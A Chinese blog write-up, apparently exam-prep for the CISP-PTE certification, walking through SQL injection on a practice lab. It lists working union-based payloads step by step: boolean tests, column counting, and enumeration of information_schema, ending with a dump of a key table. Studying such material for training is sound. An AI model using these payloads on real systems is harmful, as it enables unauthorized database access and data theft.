当前位置:网站首页>2022 CISP-PTE(二)SQL注入
2022 CISP-PTE(二)SQL注入
2022-06-27 06:26:00 【Aτθ】
一、SQL注入(实操)
1、第一道
1.1 万能密码绕过


2、第二道
2.1 题目环境



2.2 判断注入
?uuid=983fd952-df4e-4b63-946f-f2e6bb0327d6' and '1'='1
?uuid=983fd952-df4e-4b63-946f-f2e6bb0327d6' and '1'='2
或者
?uuid=983fd952-df4e-4b63-946f-f2e6bb0327d6' and 1=1;%00 ?uuid=983fd952-df4e-4b63-946f-f2e6bb0327d6' and 1=2;%00


2.3 判断回显数
?uuid=983fd952-df4e-4b63-946f-f2e6bb0327d6' order by 6;%00 ?uuid=983fd952-df4e-4b63-946f-f2e6bb0327d6' order by 7;%00


2.4 查看回显数字位置
?uuid=-1' union select 1,2,3,4,5,6;%00

2.5 查数据库名和用户
?uuid=-1' union select 1,database(),user(),4,5,6;%00

2.6 查表名
?uuid=-1' union select 1,group_concat(table_name),3,4,5,6 from information_schema.tables where table_schema=database();%00

2.7 查字段名
?uuid=-1' union select 1,group_concat(column_name),3,4,5,6 from information_schema.columns where table_schema=database() and table_name='IS_KEY';%00

2.8 查key值
?uuid=-1' union select 1,group_concat(haha),3,4,5,6 from IS_KEY;%00

边栏推荐
- Configuration of vscode korofileheader
- 【入门】正则表达式基础入门笔记
- JVM常用指令
- Scala之偏函数Partial Function
- On gpu: historical development and structure
- 日期 数据库日期 字符串 之间互相转换
- The restart status of the openstack instance will change to the error handling method. The openstack built by the container restarts the compute service method of the computing node and prompts the gi
- Software testing year end summary report template
- Redis cache penetration, cache breakdown, cache avalanche
- Fast implementation of thread mesh networking
猜你喜欢

Multithreading basic part part 1

426-二叉树(513.找树左下角的值、112. 路径总和、106.从中序与后序遍历序列构造二叉树、654. 最大二叉树)

Block level elements & inline elements
![[QT] use structure data to generate read / write configuration file code](/img/f4/685315c92f4e2528652532445fb519.png)
[QT] use structure data to generate read / write configuration file code

Assembly language - Wang Shuang Chapter 8 two basic problems in data processing - Notes

古典密码体制--代换和置换

信息系统项目管理师---第七章 项目成本管理

JVM类加载机制

Inter thread wait and wake-up mechanism, singleton mode, blocking queue, timer

JVM class loading mechanism
随机推荐
【QT小作】使用结构体数据生成读写配置文件代码
Openresty usage document
JVM的垃圾回收机制
Dev++ 环境设置C语言关键字显示颜色
汇编语言-王爽 第8章 数据处理的两个基本问题-笔记
JVM整体结构解析
飞行器翼尖加速度和控制面的MPC控制
Assembly language - Wang Shuang Chapter 11 flag register - Notes
Scala advanced_ Member access modifier
Fractional Order PID control
高斯分布Gaussian distribution、線性回歸、邏輯回歸logistics regression
Spark sql 常用时间函数
NoViableAltException([email protected][2389:1: columnNameTypeOrConstraint : ( ( tableConstraint ) | ( columnNameT
TiDB 基本功能
thrift
Redis cache penetration, cache breakdown, cache avalanche
可扩展哈希
Software testing year end summary report template
TiDB的使用限制
[QT notes] simple understanding of QT meta object system